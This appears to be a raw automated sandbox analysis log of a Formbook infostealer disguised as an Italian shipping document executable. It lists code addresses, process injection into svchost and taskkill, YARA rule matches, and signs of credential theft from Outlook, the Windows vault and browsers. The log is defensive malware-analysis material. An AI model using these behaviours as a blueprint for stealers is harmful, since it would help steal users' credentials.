            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05060F306_2_05060F30
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050E2F306_2_050E2F30
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050B4F406_2_050B4F40
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050BEFA06_2_050BEFA0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05032FC86_2_05032FC8
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050FEE266_2_050FEE26
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05040E596_2_05040E59
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05052E906_2_05052E90
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050FCE936_2_050FCE93
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050FEEDB6_2_050FEEDB
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050569626_2_05056962
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050429A06_2_050429A0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0510A9A66_2_0510A9A6
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0504A8406_2_0504A840
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050428406_2_05042840
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050268B86_2_050268B8
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0506E8F06_2_0506E8F0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050FAB406_2_050FAB40
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050F6BD76_2_050F6BD7
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0503EA806_2_0503EA80
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050F75716_2_050F7571
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050DD5B06_2_050DD5B0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050FF43F6_2_050FF43F
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050314606_2_05031460
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050FF7B06_2_050FF7B0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050F16CC6_2_050F16CC
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0507516C6_2_0507516C
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0502F1726_2_0502F172
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0510B16B6_2_0510B16B
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0504B1B06_2_0504B1B0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050EF0CC6_2_050EF0CC
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050470C06_2_050470C0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050F70E96_2_050F70E9
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050FF0E06_2_050FF0E0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050F132D6_2_050F132D
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0502D34C6_2_0502D34C
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0508739A6_2_0508739A
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050452A06_2_050452A0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0505B2C06_2_0505B2C0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050E12ED6_2_050E12ED
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0505D2F06_2_0505D2F0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05043D406_2_05043D40
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050F1D5A6_2_050F1D5A
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050F7D736_2_050F7D73
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0505FDC06_2_0505FDC0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050B9C326_2_050B9C32
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050FFCF26_2_050FFCF2
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050FFF096_2_050FFF09
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05041F926_2_05041F92
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050FFFB16_2_050FFFB1
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05003FD26_2_05003FD2
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05003FD56_2_05003FD5
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05049EB06_2_05049EB0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050D59106_2_050D5910
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050499506_2_05049950
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0505B9506_2_0505B950
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050AD8006_2_050AD800
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050438E06_2_050438E0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050FFB766_2_050FFB76
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0505FB806_2_0505FB80
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050B5BF06_2_050B5BF0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0507DBF96_2_0507DBF9
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050FFA496_2_050FFA49
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050F7A466_2_050F7A46
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050B3A6C6_2_050B3A6C
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050DDAAC6_2_050DDAAC
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_05085AA06_2_05085AA0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050E1AA36_2_050E1AA3
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050EDAC66_2_050EDAC6
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_02B41A806_2_02B41A80
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_02B3C9E06_2_02B3C9E0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_02B3C9D76_2_02B3C9D7
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_02B3AC806_2_02B3AC80
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_02B3CC006_2_02B3CC00
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_02B433106_2_02B43310
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_02B451306_2_02B45130
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_02B5B6406_2_02B5B640
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04E5E4836_2_04E5E483
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04E653D46_2_04E653D4
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04E5E3646_2_04E5E364
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04E5D8886_2_04E5D888
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04E5E81D6_2_04E5E81D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F87E54 appears 99 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FBF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F2B970 appears 262 times
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: String function: 00445AE0 appears 65 times
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: String function: 05075130 appears 58 times
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: String function: 0502B970 appears 262 times
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: String function: 050BF290 appears 103 times
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: String function: 05087E54 appears 99 times
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: String function: 050AEA12 appears 86 times
            Source: AWB_5771388044 Documenti di spedizione.exe, 00000000.00000003.1743888641.0000000004803000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs AWB_5771388044 Documenti di spedizione.exe
            Source: AWB_5771388044 Documenti di spedizione.exe, 00000000.00000003.1743023281.00000000049AD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs AWB_5771388044 Documenti di spedizione.exe
            Source: AWB_5771388044 Documenti di spedizione.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.4d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.4d0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2131558880.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3591898064.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3591841259.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3600066837.0000000008F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3593251845.00000000028D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3591581349.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2132078710.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2131255938.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@9/8
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeFile created: C:\Users\user\AppData\Local\Temp\SanchaJump to behavior
            Source: AWB_5771388044 Documenti di spedizione.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: taskkill.exe, 00000006.00000003.2306418108.0000000003154000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3591945619.0000000003154000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2306247497.0000000003133000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: AWB_5771388044 Documenti di spedizione.exeReversingLabs: Detection: 68%
            Source: AWB_5771388044 Documenti di spedizione.exeVirustotal: Detection: 47%
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeFile read: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe "C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe"
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe"
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe"
            Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe"Jump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: AWB_5771388044 Documenti di spedizione.exeStatic file information: File size 1398875 > 1048576
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: pSySrLvnviNdEH.exe, 00000005.00000002.3591578337.000000000028E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: AWB_5771388044 Documenti di spedizione.exe, 00000000.00000003.1742877662.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, AWB_5771388044 Documenti di spedizione.exe, 00000000.00000003.1741605002.0000000004880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2033813185.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2131590936.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2031785943.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2131590936.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2133606313.0000000004E57000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2131496919.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593157085.000000000519E000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593157085.0000000005000000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: AWB_5771388044 Documenti di spedizione.exe, 00000000.00000003.1742877662.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, AWB_5771388044 Documenti di spedizione.exe, 00000000.00000003.1741605002.0000000004880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.2033813185.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2131590936.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2031785943.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2131590936.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, taskkill.exe, 00000006.00000003.2133606313.0000000004E57000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2131496919.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593157085.000000000519E000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593157085.0000000005000000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: taskkill.pdbGCTL source: svchost.exe, 00000001.00000003.2099883367.000000000082C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2099755075.000000000081B000.00000004.00000020.00020000.00000000.sdmp, pSySrLvnviNdEH.exe, 00000005.00000003.2200626845.0000000000C7F000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.0000000006ADC000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.000000000562C000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3591945619.00000000030DB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2417378163.0000000036CBC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.0000000006ADC000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.000000000562C000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3591945619.00000000030DB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2417378163.0000000036CBC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: taskkill.pdb source: svchost.exe, 00000001.00000003.2099883367.000000000082C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2099755075.000000000081B000.00000004.00000020.00020000.00000000.sdmp, pSySrLvnviNdEH.exe, 00000005.00000003.2200626845.0000000000C7F000.00000004.00000001.00020000.00000000.sdmp
